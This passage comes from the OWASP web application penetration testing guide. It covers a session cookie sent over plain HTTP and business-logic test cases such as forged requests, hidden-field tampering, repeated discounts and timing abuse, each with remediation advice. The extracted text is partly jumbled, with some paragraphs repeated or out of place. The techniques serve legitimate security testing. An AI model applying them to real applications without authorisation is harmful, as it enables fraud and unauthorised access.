Example 3: Cookie Containing Session ID Sent over HTTP The Session ID Cookie must be transmitted over protected channels. If the cookie does not have the secure flag set [6] it is permitted for the application to transmit it unencrypted. Note below the setting of the cookie is done without the Secure flag, and the entire log in process is performed in HTTP and not HTTPS. https://secure.example.com/login POST /login HTTP/1.1 Host: secure.example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://secure.example.com/ Content-Type: application/x-www-form-urlencoded Content-Length: 188 HTTP/1.1 302 Found Date: Tue, 03 Dec 2013 21:18:55 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, maxage=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; expires=Fri, 01-Jan-2014 00:00:00 GMT; 176 Web Application Penetration Testing path=/; domain=example.com; httponly Location: private/ X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Content-Length: 0 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html ---------------------------------------------------------http://example.com/private GET /private HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://secure.example.com/login Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; Connection: keep-alive HTTP/1.1 200 OK Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html;charset=UTF-8 Content-Length: 730 Date: Tue, 25 Dec 2013 00:00:00 GMT ---------------------------------------------------------- Tools • [5] curl can be used to check manually for pages References OWASP Resources • [1] OWASP Testing Guide - Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection (OTG-CRYPST-001) • [2] OWASP TOP 10 2010 - Insufficient Transport Layer Protection • [3] OWASP TOP 10 2013 - Sensitive Data Exposure • [4] OWASP ASVS v1.1 - V10 Communication Security Verification Requirements • [6] OWASP Testing Guide - Testing for Cookies attributes (OTG-SESS-002) Testing for business logic Summary Testing for business logic flaws in a multi-functional dynamic web application requires thinking in unconventional methods. If an application’s authentication mechanism is developed with the intention of performing steps 1, 2, 3 in that specific order to authenticate a user. What happens if the user goes from step 1 straight to step 3? In this simplistic example, does the application provide access by failing open; deny access, or just error out with a 500 message? There are many examples that can be made, but the one constant lesson is “think outside of conventional wisdom”. This type of vulnerability cannot be detected by a vulnerability scanner and relies upon the skills and creativity of the penetration tester. In addition, this type of vulnerability is usually one of the hardest to detect, and usually application specific but, at the same time, usually one of the most detrimental to the application, if exploited. The classification of business logic flaws has been under-studied; although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. Testing of business logic flaws is similar to the test types used by functional testers that focus on logical or finite state testing. These types of tests require that security professionals think a bit differently, develop abused and misuse cases and use many of the testing techniques embraced by functional testers. Automation of business logic abuse cases is not possible and remains a manual art relying on the skills of the tester and their knowledge of the complete business process and its rules. Business Limits and Restrictions Consider the rules for the business function being provided by the application. Are there any limits or restrictions on people’s behavior? Then consider whether the application enforces those rules. It’s generally pretty easy to identify the test and analysis cases to verify the application if you’re familiar with the business. If you are a third-party tester, then you’re going to have to use your common sense and ask the business if different operations should be allowed by the application. Sometimes, in very complex applications, the tester will not have a full understanding of every aspect of the application initially. In these situations, it is best to have the client walk the tester through the application, so that they may gain a better understanding of the limits and intended functionality of the application, before the actual test begins. Additionally, having a direct line to the developers (if possible) during testing will help out greatly, if any questions arise regarding the application’s functionality. Description of the Issue Automated tools find it hard to understand context, hence it’s up to a person to perform these kinds of tests. The following two examples will illustrate how understanding the functionality of the application, the developer’s intentions, and some creative “out-of-the-box” thinking can break the application’s logic. The first example starts with a simplistic parameter manipulation, whereas the second is a real world example of a multi-step process leading to completely subvert the application. 177 Web Application Penetration Testing Example 1: Suppose an e-commerce site allows users to select items to purchase, view a summary page and then tender the sale. What if an attacker was able to go back to the summary page, maintaining their same valid session and inject a lower cost for an item and complete the transaction, and then check out? Example 2: Holding/locking resources and keeping others from purchases these items online may result in attackers purchasing items at a lower price. The countermeasure to this problem is to implement timeouts and mechanisms to ensure that only the correct price can be charged. Example 3: What if a user was able to start a transaction linked to their club/ loyalty account and then after points have been added to their account cancel out of the transaction? Will the points/credits still be applied to their account? Business Logic Test Cases Every application has a different business process, application specific logic and can be manipulated in an infinite number of combinations. This section provides some common examples of business logic issues but in no way a complete list of all issues. Business Logic exploits can be broken into the following categories: 4.12.1 Test business logic data validation (OTG-BUSLOGIC-001) In business logic data validation testing, we verify that the application does not allow users to insert “unvalidated” data into the system/application. This is important because without this safeguard attackers may be able to insert “unvalidated” data/information into the application/system at “handoff points” where the application/system believes that the data/information is “good” and has been valid since the “entry points” performed data validation as part of the business logic workflow. 4.12.2 Test Ability to forge requests (OTG-BUSLOGIC-002) In forged and predictive parameter request testing, we verify that the application does not allow users to submit or alter data to any component of the system that they should not have access to, are accessing at that particular time or in that particular manner. This is important because without this safeguard attackers may be able to “fool/trick” the application into letting them into sections of thwe application of system that they should not be allowed in at that particular time, thus circumventing the applications business logic workflow. 4.12.3 Test Integrity Checks (OTG-BUSLOGIC-003) In integrity check and tamper evidence testing, we verify that the application does not allow users to destroy the integrity of any part of the system or its data. This is important because without these safe guards attackers may break the business logic workflow and change of compromise the application/system data or cover up actions by altering information including log files. 4.12.4 Test for Process Timing (OTG-BUSLOGIC-004) In process timing testing, we verify that the application does not allow users to manipulate a system or guess its behavior based on input or output timing. This is important because without this safeguard in place attackers may be able to monitor processing time and determine outputs based on timing, or circumvent the application’s business logic by not completing transactions or actions in a timely manner. 4.12.5 Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005) In function limit testing, we verify that the application does not allow users to exercise portions of the application or its functions more times than required by the business logic workflow. This is important because without this safeguard in place attackers may be able to use a function or portion of the application more times than permissible per the business logic to gain additional benefits. 4.12.6 Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006) In circumventing workflow and bypassing correct sequence testing, we verify that the application does not allow users to perform actions outside of the “approved/required” business process flow. This is important because without this safeguard in place attackers may be able to bypass or circumvent workflows and “checks” allowing them to prematurely enter or skip “required” sections of the application potentially allowing the action/transaction to be completed without successfully completing the entire business process, leaving the system with incomplete backend tracking information. 4.12.7 Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007) In application mis-use testing, we verify that the application does not allow users to manipulate the application in an unintended manner. 4.12.8 Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) In unexpected file upload testing, we verify that the application does not allow users to upload file types that the system is not expecting or wanted per the business logic requirements. This is important because without these safeguards in place attackers may be able to submit unexpected files such as .exe or .php that could be saved to the system and then executed against the application or system. 4.12.9 Test Upload of Malicious Files (OTG-BUSLOGIC-009) In malicious file upload testing, we verify that the application does not allow users to upload files to the system that are malicious or potentially malicious to the system security. This is important because without these safeguards in place attackers may be able to upload files to the system that may spread viruses, malware or even exploits such as shellcode when executed. Tools While there are tools for testing and verifying that business processes are functioning correctly in valid situations these tools are incapable of detecting logical vulnerabilities. For example, tools have no means of detecting if a user is able to circumvent the business process flow through editing parameters, predicting resource names or escalating privileges to access restricted resources nor do they have any mechanism to help the human 178 Web Application Penetration Testing testers to suspect this state of affairs. The following are some common tool types that can be useful in identifying business logic issues. HP Business Process Testing Software • http://www8.hp.com/us/en/software-solutions/software.html?compURI=1174789#.UObjK3ca7aE Intercepting Proxy - To observe the request and response blocks of HTTP traffic. • Webscarab - https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project • Burp Proxy - http://portswigger.net/burp/proxy.html • Paros Proxy - http://www.parosproxy.org/ Web Browser Plug-ins - To view and modify HTTP/HTTPS headers, post parameters and observe the DOM of the Browser • Tamper Data (for Internet Explorer) - https://addons.mozilla. org/en-us/firefox/addon/tamper-data/ • TamperIE (for Internet Explorer) - http://www.bayden.com/ tamperie/ • Firebug (for Internet Explorer) - https://addons.mozilla.org/enus/firefox/addon/firebug/ and http://getfirebug.com/ Miscellaneous Test Tools • Web Developer toolbar - https://chrome.google.com/webstore/detail/bfbameneiokkgbdmiekhjnmfkcnldhhm The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox. • HTTP Request Maker - https://chrome.google.com/webstore/ detail/kajfghlhfkcocafkcjlajldicbikpgnp?hl=en-US Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests • Cookie Editor - https://chrome.google.com/webstore/detail/ fngmhnnpilhplaeedifhccceomclgfbg?hl=en-US Edit This Cookie is a cookie manager. You can add, delete, edit, search, protect and block cookies • Session Manager - https://chrome.google.com/webstore/detail/bbcnbpafconjjigibnhbfmmgdbbkcjfi With Session Manager you can quickly save your current browser state and reload it whenever necessary. You can manage multiple sessions, rename or remove them from the session library. Each session remembers the state of the browser at its creation time, i.e. the opened tabs and windows. Once a session is opened, the browser is restored to its state. site you use, with all your accounts; if you want to use another account just swap profile! • HTTP Response Browser - https://chrome.google.com/webstore/detail/mgekankhbggjkjpcbhacjgflbacnpljm?hl=en-US Make HTTP requests from your browser and browse the response (HTTP headers and source). Send HTTP method, headers and body using XMLHttpRequest from your browser then view the HTTP status, headers and source. Click links in the headers or body to issue new requests. This plug-in formats XML responses and uses Syntax Highlighter < http://alexgorbatchev.com/ >. • Firebug lite for Chrome - https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench Firebug Lite is not a substitute for Firebug, or Chrome Developer Tools. It is a tool to be used in conjunction with these tools. Firebug Lite provides the rich visual representation we are used to see in Firebug when it comes to HTML elements, DOM elements, and Box Model shading. It provides also some cool features like inspecting HTML elements with your mouse, and live editing CSS properties. References Whitepapers • Business Logic Vulnerabilities in Web Applications http://www.google.com/url?sa=t&rct=j&q=BusinessLogicVulnerabilities.pdf&source=web&cd=1&cad=rja&ved=0CDIQFjAA&url=http%3A%2F%2Faccorute.googlecode. com%2Ffiles%2FBusinessLogicVulnerabilities.pdf&ei=2Xj9UJO5LYaB0QHakwE&usg=AFQjCNGlAcjK2uz2U87bTjTHjJ-T0T3THg&bvm=bv.41248874,d.dmg • The Common Misuse Scoring System (CMSS): Metrics for Software Feature Misuse Vulnerabilities - NISTIR 7864 - http://csrc. nist.gov/publications/nistir/ir7864/nistir-7864.pdf • Designing a Framework Method for Secure Business Application Logic Integrity in e-Commerce Systems, Faisal Nabi http://ijns.femto.com.tw/contents/ijns-v12-n1/ijns-2011-v12n1-p29-41.pdf • Finite State testing of Graphical User Interfaces, Fevzi Belli http://www.slideshare.net/Softwarecentral/finitestate-testing-of-graphical-user-interfaces • Principles and Methods of Testing Finite State Machines - A Survey, David Lee, Mihalis Yannakakis - http://www.cse.ohiostate.edu/~lee/english/pdf/ieee-proceeding-survey.pdf • Security Issues in Online Games, Jianxin Jeff Yan and Hyun-Jin Choi - http://homepages.cs.ncl.ac.uk/jeff.yan/TEL.pdf • Cookie Swap - https://chrome.google.com/webstore/detail/ dffhipnliikkblkhpjapbecpmoilcama?hl=en-US • Securing Virtual Worlds Against Real Attack, Dr. Igor Muttik, McAfee - https://www.info-point-security.com/open_downloads/2008/McAfee_wp_online_gaming_0808.pdf Swap My Cookies is a session manager, it manages your cookies, letting you login on any website with several different accounts. You can finally login into Gmail, yahoo, hotmail, and just any web- • Seven Business Logic Flaws That Put Your Website At Risk – Jeremiah Grossman Founder and CTO, WhiteHat Security https://www.whitehatsec.com/resource/whitepapers/busi- 179 Web Application Penetration Testing ness_logic_flaws.html • Toward Automated Detection of Logic Vulnerabilities in Web Applications - Viktoria Felmetsger Ludovico Cavedon Christopher Kruegel Giovanni Vigna - https://www.usenix.org/legacy/ event/sec10/tech/full_papers/Felmetsger.pdf Business_Logic_White_Paper.pdf Books • The Decision Model: A Business Logic Framework Linking Business and Technology, By Barbara Von Halle, Larry Goldberg, Published by CRC Press, ISBN1420082817 (2010) • 2012 Web Session Intelligence & Security Report: Business Logic Abuse, Dr. Ponemon - http://www.emc.com/collateral/ rsa/silvertail/rsa-silver-tail-ponemon-ar.pdf Test business logic data validation (OTG-BUSLOGIC-001) • 2012 Web Session Intelligence & Security Report: Business Logic Abuse (UK) Edition, Dr. Ponemon - http://buzz.silvertailsystems.com/Ponemon_UK.htm OWASP Related • Business Logic Attacks – Bots and Bats, Eldad Chai - http:// www.imperva.com/resources/adc/pdfs/AppSecEU09_BusinessLogicAttacks_EldadChai.pdf • OWASP Detail Misuse Cases - https://www.owasp.org/index. php/Detail_misuse_cases • How to Prevent Business Flaws Vulnerabilities in Web Applications, Marco Morana - http://www.slideshare.net/marco_morana/issa-louisville-2010morana Useful Web Sites • Abuse of Functionality - http://projects.webappsec.org/w/ page/13246913/Abuse-of-Functionality • Business logic - http://en.wikipedia.org/wiki/Business_logic • Business Logic Flaws and Yahoo Games - http://jeremiahgrossman.blogspot.com/2006/12/business-logic-flaws.html • CWE-840: Business Logic Errors - http://cwe.mitre.org/data/ definitions/840.html • Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic http://www.slideshare.net/RafalLos/defying-logic-business-logic-testing-with-automation • Prevent application logic attacks with sound app security practices http://searchappsecurity.techtarget. co m /qn a /0, 2 8 9202 ,si d 92_g c i1213 424 ,0 0 . h t m l ? b u c ket=NEWS&topic=302570 • Real-Life Example of a ‘Business Logic Defect - http://h30501. www3.hp.com/t5/Following-the-White-Rabbit-A/Real-LifeExample-of-a-Business-Logic-Defect-Screen-Shots/bap/22581 • Software Testing Lifecycle - http://softwaretestingfundamentals.com/software-testing-life-cycle/ • Top 10 Business Logic Attack Vectors Attacking and Exploiting Business Application Assets and Flaws – Vulnerability Detection to Fix http://www.ntobjectives.com/go/business-logic-attack-vectors-white-paper/ and http://www.ntobjectives.com/files/ Summary The application must ensure that only logically valid data can be entered at the front end as well as directly to the server side of an application of system. Only verifying data locally may leave applications vulnerable to server injections through proxies or at handoffs with other systems. This is different from simply performing Boundary Value Analysis (BVA) in that it is more difficult and in most cases cannot be simply verified at the entry point, but usually requires checking some other system. For example: An application may ask for your Social Security Number. In BVA the application should check formats and semantics (is the value 9 digits long, not negative and not all 0’s) for the data entered, but there are logic considerations also. SSNs are grouped and categorized. Is this person on a death file? Are they from a certain part of the country? Vulnerabilities related to business data validation is unique in that they are application specific and different from the vulnerabilities related to forging requests in that they are more concerned about logical data as opposed to simply breaking the business logic workflow. The front end and the back end of the application should be verifying and validating that the data it has, is using and is passing along is logically valid. Even if the user provides valid data to an application the business logic may make the application behave differently depending on data or circumstances. Examples Example 1 Suppose you manage a multi-tiered e-commerce site that allows users to order carpet. The user selects their carpet, enters the size, makes the payment, and the front end application has verified that all entered information is correct and valid for contact information, size, make and color of the carpet. But, the business logic in the background has two paths, if the carpet is in stock it is directly shipped from your warehouse, but if it is out of stock in your warehouse a call is made to a partner’s system and if they have it in-stock they will ship the order from their warehouse and reimbursed by them. What happens if an attacker is able to continue a valid in-stock transaction and send it as out-of-stock to your partner? What happens if an attacker is able to get in the middle and send messages to the partner warehouse ordering carpet without payment? Example 2 Many credit card systems are now downloading account balances nightly so the customers can check out more quickly for amounts under a certain value. The inverse is also true. I f I pay my credit card off in the morning I may not be able to use the available credit in the evening. Another example may be if I use my credit card at multiple locations very quickly it may be 180 Web Application Penetration Testing possible to exceed my limit if the systems are basing decisions on last night’s data. How to Test Generic Test Method • Review the project documentation and use exploratory testing looking for data entry points or hand off points between systems or software. • Once found try to insert logically invalid data into the applica tion/system. Specific Testing Method: • Perform front-end GUI Functional Valid testing on the application to ensure that the only “valid” values are accepted. • Using an intercepting proxy observe the HTTP POST/GET look ing for places that variables such as cost and quality are passed. Specifically, look for “hand-offs” between application/systems that may be possible injection of tamper points. • Once variables are found start interrogating the field with log ically “invalid” data, such as social security numbers or unique identifiers that do not exist or that do not fit the business logic. This testing verifies that the server functions properly and does not accept logically invalid data them. Related Test Cases • All Input Validation test cases • Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004) • Testing for Bypassing Session Management Schema (OTG-SESS-001) • Testing for Exposed Session Variables (OTG-SESS-004) Tools • OWASP Zed Attack Proxy (ZAP) https://www.owasp.org/index.php/OWASP_Zed_Attack_ Proxy_Project • ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. References Beginning Microsoft Visual Studio LightSwitch Development http://books.google.com/books?id=x76L_kaTgdEC&pg=PA280&lpg=PA280&dq=business+logic+example+valid+data+example&source=bl&ots=GOfQ-7f4Hu&sig=4jOejZVligZOrvjBFRAT4-jy8DI&hl=en&sa=X&ei=mydYUt6qEOX54APu7IDgCQ&ved=0CFIQ6AEwBDgK#v=onep- age&q=business%20logic%20example%20valid%20data%20 example&f=false Remediation The application/system must ensure that only “logically valid” data is accepted at all input and hand off points of the application or system and data is not simply trusted once it has entered the system. Test Ability to forge requests (OTG-BUSLOGIC-002) Summary Forging requests is a method that attackers use to circumvent the front end GUI application to directly submit information for back end processing. The goal of the attacker is to send HTTP POST/GET requests through an intercepting proxy with data values that is not supported, guarded against or expected by the applications business logic. Some examples of forged requests include exploiting guessable or predictable parameters or expose “hidden” features and functionality such as enabling debugging or presenting special screens or windows that are very useful during development but may leak information or bypass the business logic. Vulnerabilities related to the ability to forge requests is unique to each application and different from business logic data validation in that it s focus is on breaking the business logic workflow. Applications should have logic checks in place to prevent the system from accepting forged requests that may allow attackers the opportunity to exploit the business logic, process, or flow of the application. Request forgery is nothing new; the attacker uses an intercepting proxy to send HTTP POST/GET requests to the application. Through request forgeries attackers may be able to circumvent the business logic or process by finding, predicting and manipulating parameters to make the application think a process or task has or has not taken place. Also, forged requests may allow subvention of programmatic or business logic flow by invoking “hidden” features or functionality such as debugging initially used by developers and testers sometimes referred to as an ”Easter egg”. “An Easter egg is an intentional inside joke, hidden message, or feature in a work such as a computer program, movie, book, or crossword. According to game designer Warren Robinett, the term was coined at Atari by personnel who were alerted to the presence of a secret message which had been hidden by Robinett in his already widely distributed game, Adventure. The name has been said to evoke the idea of a traditional Easter egg hunt.” http://en.wikipedia.org/wiki/ Easter_egg_(media) Examples Example 1 Suppose an e-commerce theater site allows users to select their ticket, apply a onetime 10% Senior discount on the entire sale, view the subtotal and tender the sale. If an attacker is able to see through a proxy that the application has a hidden field (of 1 or 0) used by the business logic to determine if a discount has been taken or not. The attacker is then able to submit the 1 or “no discount has been taken” value multiple times to take advantage of the same discount multiple times. 181 Web Application Penetration Testing Example 2 Suppose an online video game pays out tokens for points scored for finding pirates treasure and pirates and for each level completed. These tokens can later be that can later be exchanged for prizes. Additionally each level’s points have a multiplier value equal to the level. If an attacker was able to see through a proxy that the application has a hidden field used during development and testing to quickly get to the highest levels of the game they could quickly get to the highest levels and accumulate unearned points quickly. used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Also, if an attacker was able to see through a proxy that the application has a hidden field used during development and testing to enabled a log that indicated where other online players, or hidden treasure were in relation to the attacker, they would then be able to quickly go to these locations and score points. Debugging features which remain present in the final game http://glitchcity.info/wiki/index.php/List_of_video_games_ with_debugging_features#Debugging_features_which_ remain_present_in_the_final_game How to Test Generic Testing Method • Review the project documentation and use exploratory testing looking for guessable, predictable or hidden functionality of fields. References Cross Site Request Forgery - Legitimizing Forged Requests http://fragilesecurity.blogspot.com/2012/11/cross-siterequest-forgery-legitimazing.html Easter egg - http://en.wikipedia.org/wiki/Easter_egg_(media) Top 10 Software Easter Eggs - http://lifehacker.com/371083/ top-10-software-easter-eggs • Once found try to insert logically valid data into the application/ system allowing the user go through the application/system against the normal busineess logic workflow. Remediation The application must be smart enough and designed with business logic that will prevent attackers from predicting and manipulating parameters to subvert programmatic or business logic flow, or exploiting hidden/undocumented functionality such as debugging. Specific Testing Method 1 Test integrity checks (OTG-BUSLOGIC-003) • Using an intercepting proxy observe the HTTP POST/GET looking for some indication that values are incrementing at a regular interval or are easily guessable. • If it is found that some value is guessable this value may be changed and one may gain unexpected visibility. Specific Testing Method 2 • Using an intercepting proxy observe the HTTP POST/GET looking for some indication of hidden features such as debug that can be switched on or activated. • If any are found try to guess and change these values to get a different application response or behavior. Related Test Cases Testing for Exposed Session Variables (OTG-SESS-004) Testing for Cross Site Request Forgery (CSRF) (OTG-SESS-005) Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004) Tools OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org index.php/OWASP_Zed_Attack_Proxy_Project ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be Summary Many applications are designed to display different fields depending on the user of situation by leaving some inputs hidden. However, in many cases it is possible to submit values hidden field values to the server using a proxy. In these cases the server side controls must be smart enough to perform relational or server side edits to ensure that the proper data is allowed to the server based on user and application specific business logic. Additionally, the application must not depend on non-editable controls, drop-down menus or hidden fields for business logic processing because these fields remain non-editable only in the context of the browsers. Users may be able to edit their values using proxy editor tools and try to manipulate business logic. If the application exposes values related to business rules like quantity, etc. as non-editable fields it must maintain a copy on the server side and use the same for business logic processing. Finally, aside application/system data, log systems must be secured to prevent read, writing and updating. Business logic integrity check vulnerabilities is unique in that these misuse cases are application specific and if users are able to make changes one should only be able to write or update/edit specific artifacts at specific times per the business process logic. The application must be smart enough to check for relational edits and not allow users to submit information directly to the server that is not valid, trusted because it came from a non-editable controls or the user is not authorized to submit through the front end. Additionally, system artifacts such as logs must be “protected” from unauthorized read, writing and removal. Example 182 Web Application Penetration Testing Example 1 Imagine an ASP.NET application GUI application that only allows the admin user to change the password for other users in the system. The admin user will see the username and password fields to enter a username and password while other users will not see either field. However, if a non admin user submits information in the username and password field through a proxy they may be able to “trick” the server into believing that the request has come from an admin user and change password of other users. Example 2 Most web applications have dropdown lists making it easy for the user to quickly select their state, month of birth, etc. Suppose a Project Management application allowed users to login and depending on their privileges presented them with a drop down list of projects they have access to. What happens if an attacker finds the name of another project that they should not have access to and submits the information via a proxy. Will the application give access to the project? They should not have access even though they skipped an authorization business logic check. Example 3 Suppose the motor vehicle administration system required an employee initially verify each citizens documentation and information when they issue an identification or driver’s license. At this point the business process has created data with a high level of integrity as the integrity of submitted data is checked by the application. Now suppose the application is moved to the Internet so employees can log on for full service or citizens can log on for a reduced self-service application to update certain information. At this point an attacker may be able to use an intercepting proxy to add or update data that they should not have access to and they could destroy the integrity of the data by stating that the citizen was not married but supplying data for a spouse’s name. This type of inserting or updating of unverified data destroys the data integrity and might have been prevented if the business process logic was followed. Example 4 Many systems include logging for auditing and troubleshooting purposes. But, how good/valid is the information in these logs? Can they be manipulated by attackers either intentionally or accidentially having their integrity destroyed? How to Test Generic Testing Method • Review the project documentation and use exploratory testing looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information. • For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component. • Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. Specific Testing Method 1 • Using a proxy capture and HTTP traffic looking for hidden fields. • If a hidden field is found see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values trying to circumvent the business process and manipulate values you were not intended to have access to. Specific Testing Method 2 • Using a proxy capture and HTTP traffic looking a place to insert information into areas of the application that are non-editable. • If it is found see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values trying to circumvent the business process and manipulate values you were not intended to have access to. Specific Testing Method 3 • List components of the application or system that could be edited, for example logs or databases. • For each component identified, try to read, edit or remove its information. For example log files should be identified and Testers should try to manipulate the data/information being collected. Related Test Cases All Input Validation test cases Tools • Various system/application tools such as editors and file manipulation tools. • OWASP Zed Attack Proxy (ZAP) - https://www.owasp.orgindex php/OWASP_Zed_Attack_Proxy_Project ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. References • Implementing Referential Integrity and Shared Business Logic in a RDB - http://www.agiledata.org/essayreferentialIntegrity. html • On Rules and Integrity Constraints in Database Systems http://www.comp.nus.edu.sg/~lingtw/papers/IST92.teopk.pdf • Use referential integrity to enforce basic business rules in Oracle - http://www.techrepublic.com/article/use-referentialintegrity-to-enforce-basic-business-rules-in-oracle/ • Maximizing Business Logic Reuse with Reactive Logic - http:/ architects.dzone.com/articles/maximizing-business-logic 183 Web Application Penetration Testing • Tamper Evidence Logging - http://tamperevident.cs.rice.edu Logging.html Remediation The application must be smart enough to check for relational edits and not allow users to submit information directly to the server that is not valid, trusted because it came from a non-editable controls or the user is not authorized to submit through the front end. Additionally, any component that can be edited must have mechanisms in place to prevent unintentional/intentional writing or updating. Test for Process Timing (OTG-BUSLOGIC-004) Summary It is possible that attackers can gather information on an application by monitoring the time it takes to complete a task or give a respond. Additionally, attackers may be able to manipulate and break designed business process flows by simply keeping active sessions open and not submitting their transactions in the “expected” time frame. Process timing logic vulnerabilities is unique in that these manual misuse cases should be created considering execution and transaction timing that are application/system specific. Processing timing may give/leak information on what is being done in the application/system background processes. If an application allows users to guess what the particulate next outcome will be by processing time variations, users will be able to adjust accordingly and change behavior based on the expectation and “game the system”. Example Example 1 Video gambling/slot machines may take longer to process a transaction just prior to a large payout. This would allow astute gamblers to gamble minimum amounts until they see the long process time which would then prompt them to bet the maximum. Example 2 Many system log on processes ask for the user name and password. If you look closely you may be able to see that entering an invalid user name and invalid user password takes more time to return an error than entering a valid username and invalid user password. This may allow the attacker to know if they have a valid username and not need to rely on the GUI message. Example 3 Most Arenas or travel agencies have ticketing applications that allow users to purchase tickets and reserve seats. When the user requests the tickets seats are locked or reserved pending payment. What if an attacker keeps reserving seats but not checking out? Will the seats be released, or will no tickets be sold? Some ticket vendors now only allow users 5 minutes to complete a transaction or the transaction is invalidated. Example 4 Suppose a precious metals e-commerce site allows users to make purchases with a price quote based on market price at the time they log on. What if an attacker logs on and places an order but does not complete the transaction until later in the day only of the price of the metals goes up? Will the attacker get the initial lower price? How to Test • Review the project documentation and use exploratory testing looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. • Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing. Related Test Cases • Testing for Cookies attributes (OTG-SESS-002) • Test Session Timeout (OTG-SESS-007) References None Remediation Develop applications with processing time in mind. If attackers could possibly gain some type of advantage from knowing the different processing times and results add extra steps or processing so that no matter the results they are provided in the same time frame. Additionally, the application/system must have mechanism in place to not allow attackers to extend transactions over an “acceptable” amount of time. This may be done by cancelling or resetting transactions after a specified amount of time has passed like some ticket vendors are now using. Test number of times a function can be used limits (OTG-BUSLOGIC-005) Summary Many of the problems that applications are solving require limits to the number of times a function can be used or action can be executed. Applications must be “smart enough” to not allow the user to exceed their limit on the use of these functions since in many cases each time the function is used the user may gain some type of benefit that must be accounted for to properly compensate the owner. For example: an eCommerce site may only allow a users apply a discount once per transaction, or some applications may be on a subscription plan and only allow users to download three complete documents monthly. Vulnerabilities related to testing for the function limits are application specific and misuse cases must be created that strive to exercise parts of the application/functions/ or actions more than the allowable number of times. Attackers may be able to circumvent the business logic and execute a function more times than “allowable” exploiting the application for personal gain. Example 184 Web Application Penetration Testing Suppose an eCommerce site allows users to take advantage of any one of many discounts on their total purchase and then proceed to checkout and tendering. What happens of the attacker navigates back to the discounts page after taking and applying the one “allowable” discount? Can they take advantage of another discount? Can they take advantage of the same discount multiple times? How to Test • Review the project documentation and use exploratory testing looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow. • For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times. For example, can a user navigate back and forth through the pages multiple times executing a function that should only execute once? or can a user load and unload shopping carts allowing for additional discounts. Related Test Cases • Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004) • Testing for Weak lock out mechanism (OTG-AUTHN-003) References InfoPath Forms Services business logic exceeded the maximum limit of operations Rule - http://mpwiki.viacode.com/default.aspx?g=posts&t=115678 Gold Trading Was Temporarily Halted On The CME This Morning - http://www.businessinsider.com/gold-halted-on-cme-forstop-logic-event-2013-10 Remediation The application should have checks to ensure that the business logic is being followed and that if a function/action can only be executed a certain number of times, when the limit is reached the user can no longer execute the function. To prevent users from using a function over the appropriate number of times the application may use mechanisms such as cookies to keep count or through sessions not allowing users to access to execute the function additional times. Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006) Summary Workflow vulnerabilities involve any type of vulnerability that allows the attacker to misuse an application/system in a way that will allow them to circumvent (not follow) the designed/intended workflow. “A workflow consists of a sequence of connected steps where each step follows without delay or gap and ends just before the subsequent step may begin. It is a depiction of a sequence of operations, declared as work of a person or group, an organi- zation of staff, or one or more simple or complex mechanisms. Workflow may be seen as any abstraction of real work.” (https:// en.wikipedia.org/wiki/Workflow) The application’s business logic must require that the user complete specific steps in the correct/specific order and if the workflow is terminated without correctly completing, all actions and spawned actions are “rolled back” or canceled. Vulnerabilities related to the circumvention of workflows or bypassing the correct business logic workflow are unique in that they 